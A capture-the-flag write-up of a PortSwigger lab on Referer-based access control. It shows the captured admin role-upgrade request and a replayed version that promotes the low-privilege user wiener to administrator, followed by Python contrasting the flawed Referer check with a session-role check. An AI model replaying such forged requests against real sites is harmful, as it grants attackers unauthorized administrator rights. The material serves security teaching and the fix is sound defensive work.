
Referer-based access control

Introduction

Portswigger

Category: Access control vulnerabilities

Write-up date: 10/06/2025

Question: This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

Point: PRACTITIONER

Recon

The admin panel is revealed to us, but when we try to access it the server returns "Admin interface only available if logged in as an administrator".

Try the administrator account: when we promote the user carlos to admin, the client sends a request to the /admin-roles endpoint with the username carlos and the action upgrade.

The server responds with a form asking us to confirm.

After we confirm, the client adds confirmed=true to the

POST /admin-roles HTTP/2
Host: 0aa600920489b5bc81dd7f63000400fd.web-security-academy.net
Cookie: session=admin_redacted
Content-Length: 45
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: https://0aa600920489b5bc81dd7f63000400fd.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://0aa600920489b5bc81dd7f63000400fd.web-security-academy.net/admin-roles
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

action=upgrade&confirmed=true&username=carlos

Exploit

The site has a mechanism that blocks us from accessing the admin panel at /admin, but it fails to block us at the /admin-roles endpoint: as the lab name says, that endpoint decides on the Referer header, which the client controls, rather than on the role tied to the session. Sending the same request with any valid session therefore makes the site promote that user to administrator.

Reusing the confirmation request captured in the earlier stage, swap the session cookie for the wiener account's and set username=wiener to promote wiener and complete the lab.

POST /admin-roles HTTP/2
Host: 0aa600920489b5bc81dd7f63000400fd.web-security-academy.net
Cookie: session=wiener_redacted
Content-Length: 45
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: https://0aa600920489b5bc81dd7f63000400fd.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://0aa600920489b5bc81dd7f63000400fd.web-security-academy.net/admin-roles
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

action=upgrade&confirmed=true&username=wiener
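To make the flaw concrete, here is an added example (my own code, not the lab's or the write-up's) that parses requests shaped like the two above and runs them through a Referer-based check and a role-based check. The hostname, cookie values and the session store are constructed placeholders, not lab data.

```python
"""Referer-based vs. session-role authorization for /admin-roles."""
from urllib.parse import parse_qs, urlparse

# Constructed server-side session store (placeholder values, not lab data).
SESSIONS = {"admin_redacted": {"user": "administrator", "role": "admin"},
            "wiener_redacted": {"user": "wiener", "role": "user"}}


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, path, headers and form fields."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    form = {k: v[0] for k, v in parse_qs(body.strip()).items()}
    return {"method": method, "path": path, "headers": headers, "form": form}


def session_of(req: dict):
    """Look up the server-side session named by the session cookie."""
    raw_cookie = req["headers"].get("cookie", "")
    cookies = dict(c.strip().split("=", 1) for c in raw_cookie.split(";") if "=" in c)
    return SESSIONS.get(cookies.get("session"))


def referer_check_vulnerable(req: dict) -> bool:
    """Flawed check: trusts the client-supplied Referer header (lab behaviour)."""
    referer = urlparse(req["headers"].get("referer", ""))
    return referer.path.startswith("/admin")


def role_check_fixed(req: dict) -> bool:
    """Fix: authorize from the role stored server-side for the session."""
    session = session_of(req)
    return session is not None and session["role"] == "admin"


def build_request(session_value: str, username: str) -> str:
    """Construct a request mirroring the write-up's confirmed upgrade."""
    body = f"action=upgrade&confirmed=true&username={username}"
    return ("POST /admin-roles HTTP/1.1\r\n"
            "Host: lab.example\r\n"               # placeholder host
            f"Cookie: session={session_value}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n"
            "Referer: https://lab.example/admin-roles\r\n\r\n" + body)
```

Both requests pass the Referer check, while only the administrator's session passes the role check; a request without a Referer would fail the first check, which is why the flawed version looks like access control until the header is supplied.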
